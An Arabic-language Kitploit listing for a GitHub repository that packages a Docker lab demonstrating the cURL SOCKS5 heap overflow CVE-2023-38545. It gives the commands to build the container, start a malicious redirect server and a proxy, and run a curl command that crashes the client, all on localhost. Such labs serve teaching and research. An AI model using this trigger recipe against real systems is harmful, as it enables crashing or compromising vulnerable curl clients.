Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38545-sample — Dockerfile يحتوي على جميع ملفات الإعداد اللازمة لعرض الاستغلال. | Kitploit
أدوات/GitHubGitHub/vanigori/cve-2023-38545-sample
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubvanigori/cve-2023-38545-sample

CVE-2023-38545-sample

Dockerfile يحتوي على جميع ملفات الإعداد اللازمة لعرض الاستغلال.

عرض المستودع
32منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

وصف سريع

يعرض هذا الأداة ثغرة cURL CVE-2023-38545. إنها خفيفة الوزن قدر المستطاع.

الإعداد

أولاً، قم ببناء صورة Docker:

docker build . -t cveimage

ثم، يمكننا ببساطة تشغيل ملف الصورة، مما ينشئ حاوية Docker مؤقتة سيتم حذفها بمجرد إيقاف الحاوية:

docker run --rm --tty --net="host" --name cvecontainer cveimage

إذا كنت تواجه صعوبة في كتابة الأوامر، فما عليك سوى فتح طرفية أخرى وتشغيل:

docker exec -it cvecontainer /bin/bash

الآن، نحتاج إلى بدء جميع الخدمات. اتصل بالحاوية قيد التشغيل بالفعل، وقم بتشغيل:

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

الآن، من داخل الحاوية يمكنك رؤية استغلال cURL أثناء العمل:

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

يجب أن ترى خطأ في تجزئة الذاكرة (segmentation fault) على الجهاز الذي نفذ أمر curl لتعرف أن الاستغلال نجح. إذا لم ترَه، فإما أن الاستغلال لم يحدث، أو أن العملية كان لديها مساحة كومة كبيرة جدًا بحيث لم تتمكن من الكتابة فوق الذاكرة غير القابلة للوصول.

المزيد من العمل (مساهماتكم مرحب بها)

  • جعل هذا الملف التمهيدي (README) يبدو جميلًا
  • تكوين systemd لبدء كود الاستغلال تلقائيًا
  • تقليل وقت بناء صورة Docker وحجمها
  • أي شيء/كل شيء آخر...؟

المراجع

  • وكيل socks5 ليس من صنعي. يمكن العثور على الكود الأصلي للوكيل هنا: https://github.com/alexbers/tgsocksproxy
    • تم استغلالها أصلاً في ubuntu (wsl) مع دعم systemd: https://github.com/aire1/mtproxy_autoinstaller
  • تقرير HackerOne، الذي وفر الكثير من وقت البحث. اقرأه إذا كنت تريد فهم كيفية حدوث هذا الاستغلال: https://hackerone.com/reports/2187833
تنزيل الأداة